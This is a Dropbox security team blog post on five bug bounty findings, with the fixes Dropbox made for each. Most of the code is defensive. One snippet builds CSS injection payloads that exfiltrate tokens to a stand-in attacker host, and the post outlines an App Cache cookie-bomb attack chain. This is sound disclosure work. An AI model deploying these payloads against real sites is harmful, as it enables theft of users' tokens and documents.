This guest blog post was authored by Dropbox’s Product Security Team and originally published on the Dropbox company blog.

Over the past five years, our bug bounty program has become an important part of improving our security posture, as it is now for many large tech companies. Transparency and defending the rights of legitimate researchers are cornerstones of the progress we’ve made, and the world is safer for it. To those outside of the security community, it may seem counterintuitive that you can make your platform safer by encouraging security researchers to attack you, but that’s exactly the value these programs deliver. This process of discovering and remediating bugs is key to maintaining a highly secure organization and increasingly hardened product surfaces. Our bug bounty program is only one part of a complete secure development lifecycle.

Our bug bounty program recently passed a significant milestone. Since launching our program in 2014 and tripling our bounties in 2017, we’ve given more than $1,000,000 to bug bounty participants for valid findings submitted to our program. Not only has Dropbox benefited from our bug bounty program, but so have some of our most critical vendors, who have remained active participants in our program. Together with our vendors, we have participated in two live hacking events, including the HackerOne one-day bug bounty event in Singapore. Charities have also benefited from our continued investment in security: bug bounty reporters have leveraged our donation-matching policy to donate more than $10,000 to charities around the world.

Top 5 Favorite Bugs Reported

To help celebrate this momentous occasion, the Dropbox Product Security team wanted to disclose, in depth, five of our favorite reports we’ve ever received. These amazing findings by our top bug bounty hunters impressed us, taught us, and validated the work we do to raise the bar for security.

5. Shared Link Password Bypass

HackerOne Report by detroitsmash

Have you ever wanted to share a file via link but were afraid that anyone with the link would be able to access it? Dropbox Professional and Business customers are able to password protect their shared links via an option in Link Settings. This ensures that only users with the password for the link are able to access the file.

One of our top bug bounty reporters, detroitsmash, reported on December 25, 2018, that one of our endpoints responsible for performing document previews in Paper documents was ignoring passwords set on shared links. This would allow an attacker with a copy of a password-protected shared link to bypass the password requirement and view the document.

The endpoint works as follows:

  1. A user takes a share link for one of their documents and pastes it into Dropbox Paper.
  2. The Dropbox Paper client then sends this link to our servers via an endpoint /integrations/embed/fetch/matte?sharedLinkUrl=<shared link>.
  3. This endpoint then produces a preview image to be placed within the Paper document.
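A minimal sketch of the check the endpoint needed, with hypothetical types and helper names (this is our illustration, not Dropbox’s code): before rendering a preview, verify that any password set on the shared link has already been entered for the current session.

```python
from dataclasses import dataclass

@dataclass
class SharedLink:
    id: str
    password_protected: bool

class AccessDenied(Exception):
    pass

def fetch_preview(link: SharedLink, session: dict) -> str:
    """Produce a preview only after any link password has been verified."""
    # The missing control: a password-protected link must not be previewed
    # unless this session has already passed the password prompt.
    if link.password_protected and not session.get(f"pw_ok:{link.id}"):
        raise AccessDenied("shared-link password not verified")
    return f"preview:{link.id}"  # stand-in for real preview generation
```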

After validating the report, we discovered that additional access control checks were missing on this endpoint. We immediately got to work on a fix and pushed it out within a day. detroitsmash was awarded $10,648 for the finding and later received an additional $2,744 bonus for submitting one of the best reports we received within that six-month period.

4. Paper Notification CSS Injection

HackerOne Report by 0xacb and cache-money

Last year, Dropbox started running live hacking events with HackerOne. Live hacking events take bug bounty to the real world. Top bug bounty reporters from around the globe get together, often in person, to find vulnerabilities in a company’s software. They allow bug bounty reporters to collaborate more easily and for security teams to build stronger relationships with the bug bounty reporters that help them secure their software every day.

The most recent Dropbox live hacking event surfaced many vulnerabilities, but one of our favorites from the event was found by 0xacb and cache-money in collaboration with our very own Product Security team. A small oversight in the name validation on one of our account registration endpoints began a chain of little issues that resulted in the ability to remotely access another user’s Paper documents. Dropbox teams have access to a bulk user import feature that allows a Team Admin to import users listed in a CSV file. This feature is helpful for teams that have hundreds of licenses, where manually inviting each user one by one would be too cumbersome.

0xacb discovered that while our normal account signup flow ensures that users cannot use certain “illegal” characters (including < and >) in their first and last names, the account registration via the CSV endpoint did not. While this was a bug, it wasn’t obviously a security bug; on its own it had no real security impact, because we usually sanitize everything client-side with React anyway.
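A sketch of the kind of server-side validation both endpoints should share (the character set and length limit here are illustrative, not Dropbox’s actual rules):

```python
import re

ILLEGAL = re.compile(r"[<>]")   # HTML metacharacters disallowed in names
MAX_NAME_LEN = 80               # illustrative field limit

def validate_name(name: str) -> bool:
    """Accept a name only if it is non-empty, within the length limit,
    and free of HTML metacharacters."""
    return bool(name) and len(name) <= MAX_NAME_LEN and not ILLEGAL.search(name)
```

The key point is that every registration path, including the CSV bulk import, must run through the same validator rather than duplicating the rules.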

With the day of the event just around the corner, 0xacb joined forces with cache-money to see if they could escalate this odd behavior further. At one point, cache-money created a user with the name <h1>First Name</h1> and shared a Paper document with 0xacb. They immediately noticed that in the Dropbox web client notifications, the user’s name rendered as “First Name” in a large, bold font. This indicated that HTML injection was possible, but with our CSP and use of DOMPurify in our notifications, there was a significant barrier preventing them from escalating to XSS.

After some additional investigation, we discovered that it was possible to trigger this behavior on the Desktop client as well. Members of the Product Security team and the bug bounty hunters spent some time trying to escalate this HTML injection into something more impactful, but we concluded that the CSP rules used in the Desktop environment were too restrictive to allow for more interesting attacks.

Moving back to the web client, we realized that DOMPurify allows <style> tags through in its default configuration. This meant an attacker could reapply styles on the page, making it look however they wanted. Another big obstacle to exploitation, however, was the limit on the number of characters allowed in the first and last name fields.

Normally, an attacker can leverage CSS injection to exfiltrate sensitive tokens (like a CSRF token) from the page using selectors; however, the payload needed for this kind of attack usually requires hundreds of characters, far more than the 80 allowed here. After some brainstorming, we independently rediscovered a technique using a CSS “at-rule” called @import (originally documented by sirdarckcat), which allowed us to exfiltrate tokens from the page using just CSS and a payload well under the 80-character limit.
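A quick illustration of the size difference (the attacker domain, token field, and exact markup below are hypothetical):

```python
# Selector-based exfiltration needs one CSS rule per guessed token prefix,
# so a realistic payload balloons quickly:
prefixes = ["a", "b", "c"]  # in practice, dozens of guesses per character
selector_style = "<style>" + "".join(
    f'input[name=csrf][value^="{p}"]'
    f"{{background:url(//atk.example/{p})}}"
    for p in prefixes
) + "</style>"

# The @import variant defers all of that CSS to an attacker-controlled
# stylesheet, so the injected payload itself stays tiny:
import_style = "<style>@import url(//atk.example/s)</style>"

assert len(import_style) < 80 < len(selector_style)
```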

Now, all an attacker had to do was create a team, create a user with the payload as their first and last name, and share a Paper document with a victim. If the victim opened their notifications, the attacker could exfiltrate the URLs of Paper documents present on the page. We fixed the vulnerability the day of the H1-65 Live Hacking event and paid 0xacb and cache-money $12,167 for their report, plus an additional $1,000 bonus for having the “Coolest Proof of Concept” of all the submissions.

3. Gopher SSRF

HackerOne Report by mlitchfield

Modern web applications often have to make server-side requests to external, third-party services to transmit and receive relevant information, whether to send a notification to a developer’s webhook, read information from an external API, or fetch a file from a remote address.

This functionality, however, can come at a great cost. Improperly configured and mitigated, it can quickly turn into a vulnerability called Server-Side Request Forgery (SSRF). SSRF occurs when an attacker has the ability to issue or redirect a server-side request into a sensitive, often internal, location. The impact of SSRF varies, but it can lead to Remote Code Execution if left unchecked.

A general mitigation for this class of attack, and the one we commonly use here at Dropbox, is routing all externally bound server-side requests through HTTP proxy servers. If properly configured, the proxies will prevent requests from reaching addresses you deem sensitive, like internal IPs or a metadata service. The problem with HTTP proxies, though, is that they’re usually only meant to handle HTTP and HTTPS traffic. That means if your server starts speaking a protocol that isn’t HTTP-based, you can quickly find yourself beyond the help of your proxies.
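The policy such a proxy enforces can be sketched in a few lines; this illustrative check (not Dropbox’s implementation) resolves a host and refuses private, loopback, and link-local destinations:

```python
import ipaddress
import socket

def is_safe_destination(host: str) -> bool:
    """Return False if the host resolves to any internal address,
    e.g. a private IP or a cloud metadata service."""
    try:
        infos = socket.getaddrinfo(host, None)
    except socket.gaierror:
        return False  # unresolvable hosts are rejected, not retried
    for _family, _type, _proto, _cname, sockaddr in infos:
        ip = ipaddress.ip_address(sockaddr[0])
        if ip.is_private or ip.is_loopback or ip.is_link_local:
            return False
    return True
```

Note that a resolve-then-connect check like this is still exposed to DNS rebinding if the request resolves the name a second time; enforcing the policy at the proxy, on the connection actually being made, avoids that race.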

Unfortunately for us, Dropbox often uses libcurl to make network requests, and libcurl supports dozens of different protocols, not just HTTP and HTTPS. In HackerOne report 139572, bug bounty participant Mark Litchfield discovered that by returning a 302 redirect to the request issued by Dropbox from our Saver API, he was able to switch to an esoteric protocol called Gopher. Because Gopher is not HTTP-based, the request did not go through our configured proxies, allowing him to hit internal services.

Mitigating this vulnerability was not as straightforward as preventing redirects and disabling bad protocols at the app layer, since the same problem could affect other places we make outbound requests in the future. To make our mitigation robust, we looked at all of the protocols available in libcurl and manually patched out every protocol we did not need to support, future-proofing ourselves against this class of problem.
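At the application layer, the complementary guard is a scheme allowlist that must be re-applied to every redirect target, not just the initial URL; a sketch (not Dropbox’s code):

```python
from urllib.parse import urlparse

ALLOWED_SCHEMES = {"http", "https"}

def check_outbound_url(url: str) -> None:
    """Raise if a URL uses a scheme outside the allowlist. Callers must
    apply this to each redirect Location as well, since the redirect is
    exactly where the switch to Gopher happened."""
    scheme = urlparse(url).scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        raise ValueError(f"disallowed scheme: {scheme!r}")
```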

For the excellent work and great report written by Mark, which we received well before we raised our bounties, we awarded $6,859.

2. App Cache Manifest

HackerOne Report by fransrosen

Making a secure platform to store, share, and collaborate on files is a deceptively hard problem. Dropbox has to handle any kind of file you can throw at it while ensuring the safety of everyone else using the platform. We also want to avoid compromising the experience of working with these files as much as possible, so sanitizing a file when a user fetches it is generally off the table, since it would manipulate the contents and integrity of the file.

One of our main mitigations against attacks like XSS is origin isolation. That is, we use an entirely separate origin to serve file contents, including when we render files via iframe in the web client. By serving file contents from a separate origin, we avoid needing to do any sanitization of the content and are able to serve back the raw bytes of the file. Even if the file were a malicious XSS payload, the XSS would execute in a useless origin, protecting unsuspecting victims from potential compromise.

Unfortunately, Frans discovered in early 2016 that this wasn’t entirely true. Using a lesser-known HTML feature called the App Cache Manifest, he found a chain that could allow an attacker to steal the raw file contents of unsuspecting users merely by sending them a link. Before we get into the details of how this attack worked, let’s talk briefly about what an App Cache Manifest is.

An App Cache Manifest is a file that describes what files a browser should cache locally for improved performance and experience. A webpage can mark itself as having an App Cache Manifest via an attribute, manifest, on the html tag at the top of the document. The browser will, based on the directives in the manifest, fetch and store any files necessary to comply with the manifest.

One important note about the App Cache Manifest is the FALLBACK directive. FALLBACK tells the browser what asset to load from the cache if a particular resource is unavailable. It’s important to note that this is not a redirect (the URL of the page will not change); the browser just serves up different contents in place of the original asset.
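As an illustration (filenames hypothetical), a minimal manifest using FALLBACK looks like the following; a page opts in with a manifest attribute such as <html manifest="manifest.txt">:

```
CACHE MANIFEST
# When any resource under / fails to load, serve fallback.xml
# from the local application cache instead
FALLBACK:
/ fallback.xml
```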

Now that we know what an App Cache Manifest is for, we can discuss the attack in detail.

  1. An attacker would upload an App Cache Manifest (manifest.txt) to their public folder with a FALLBACK directive that instructs the browser to load fallback.xml.
  2. The attacker would also upload an HTML file, containing a Cookie Bomb payload, to their public Dropbox folder using an extension of .xml (we blocked rendering of .html and .htm files using the Content-Disposition: attachment header). This HTML page points its manifest attribute at the previously uploaded manifest.txt. The point of the Cookie Bomb attack is to ensure that subsequent loads from the content-serving domain fail due to the sheer number of cookies being sent.
  3. Lastly, the attacker would upload fallback.xml, containing a JavaScript payload, to their public folder.

The attacker would then trick a victim into opening the uploaded .xml page via a shared link, so the victim views the file in our web client. The browser would then fetch the manifest marked by the manifest attribute on the page, then fetch any of the assets listed in the manifest, including those under the FALLBACK directive. After these files were fetched, the browser would begin processing the JavaScript and filling up its cookie jar for the domain.

Any time the victim’s browser tried fetching from that domain in the future, the request would fail due to the earlier Cookie Bomb attack. Upon failure, the App Cache Manifest’s FALLBACK directive would kick in, silently loading the content of the fallback page from the local cache instead of the remote asset. The fallback JavaScript payload would grab the current URL, which contained a secret, and send the page address to the attacker so they could fetch the content themselves.

It’s quite a complicated attack, but very effective.

Mitigating this was no easy task either. It’s not quite as simple as sanitizing the javascript or blocking uploads of App Cache Manifest files. We use the following approaches as a holistic solution to our App Cache Manifest woes:

  1. We extended our disabled-rendering protection to additional file types on the content-serving domain by setting Content-Disposition: attachment.
  2. We isolated origins by using a CSP sandbox directive alongside allow-scripts.
  3. Later, we added a defense-in-depth measure by ensuring we served our content using randomized subdomains instead of relying on just the CSP origin isolation. Each piece of content is now served on its own, isolated origin which significantly mitigates the risk of this kind of attack.
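The first two mitigations amount to response-header hardening, sketched below with a framework-agnostic helper (the function name and dict-of-headers shape are ours, not Dropbox’s):

```python
def harden_user_content_response(headers: dict) -> dict:
    """Apply the two header-level mitigations to a user-content response."""
    # 1. Disable inline rendering for risky file types: the browser
    #    downloads the file instead of interpreting it as a document.
    headers["Content-Disposition"] = "attachment"
    # 2. Sandbox anything that does render; allow-scripts keeps previews
    #    functional while the sandbox gives the document a unique origin.
    headers["Content-Security-Policy"] = "sandbox allow-scripts"
    return headers
```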

For this incredible report, we awarded Frans $10,648 for his finding, plus a $2,197 bonus for submitting one of the top reports we received during that six-month period.

1. ImageTragick

HackerOne report by Stewie

In the modern web, image processing is nearly as ubiquitous a task as authentication. Whether resizing profile photos, adjusting colors, or changing image formats, image processing is either a supplementary or a fundamental feature of a service and can make or break a user experience. For our Thumbnail and Preview pipeline, image processing is a core part of what makes the experience of quickly finding a particular document so easy.

One of the most commonly used libraries to perform image processing is ImageMagick. With support for over 200 image formats and numerous transformations, ImageMagick tries to be a one-stop-shop for all of your image processing needs.

Stewie, with further improvements by Nikolay Ermishkin of the Mail.Ru security team, discovered a series of vulnerabilities within ImageMagick, dubbed “ImageTragick.” The more serious of the findings involve Remote Code Execution (RCE), SSRF, and Local File Inclusion (LFI), giving an attacker plenty of ways to go about attacking a vulnerable target.

The attack primarily leverages an esoteric file format called MVG, or Magick Vector Graphics. MVG, similar to SVG, uses instructions that tell the image processor how to construct the vectorized image, as opposed to including the raw image data in the file. Unfortunately, some of these instructions, as well as their implementations in ImageMagick, allow for exploitation if mitigations are not in place.
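As a concrete illustration, the widely published ImageTragick guidance recommended a policy.xml that disables the coders abused by the proof-of-concept files (this shows the published mitigation, not necessarily Dropbox’s configuration):

```xml
<policymap>
  <!-- Disable the coders the ImageTragick PoCs rely on -->
  <policy domain="coder" rights="none" pattern="EPHEMERAL" />
  <policy domain="coder" rights="none" pattern="URL" />
  <policy domain="coder" rights="none" pattern="HTTPS" />
  <policy domain="coder" rights="none" pattern="MVG" />
  <policy domain="coder" rights="none" pattern="MSL" />
</policymap>
```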

ImageTragick would have been the stuff of nightmares for many security teams back in 2016; however, this story has a happy ending for Dropbox. While we were vulnerable to ImageTragick, as Stewie pointed out in report 133377, our robust jailing infrastructure was able to mitigate a majority of the impact. Even the RCE variant of ImageTragick was not enough to cause us much worry as our jails limit network connectivity, access to other users’ files, and even which syscalls can be invoked. By leveraging solid isolation practices, we’ve been able to mitigate most of the risk from running unsafe and untrusted binaries like ImageMagick, xmlsec, and even LibreOffice.

Even though the risk to Dropbox was minimal, we awarded $729 for the finding and gave an additional $512 for providing the mitigation to this 0-day.


At Dropbox, we value the relationships we continue to build with the security researcher community, and we strive to attract the top bug hunting talent in the world. Many friendly bug bounty reporters out there are dedicated to finding vulnerabilities, and with their help we keep those vulnerabilities out of bad actors’ hands. After crossing the $1 million payout threshold, Dropbox is going to keep working towards the next million and beyond.

The five bugs discussed here are just a few examples that validated the diligent work and impact of the Dropbox Security team, revealed how different risks can manifest from multiple directions, and helped make Dropbox a safer and more secure platform.

Special thanks to Nathanial Lattimer aka @d0nut

To learn more about Dropbox’s bug bounty program or to start hacking, visit

Posted by Charlie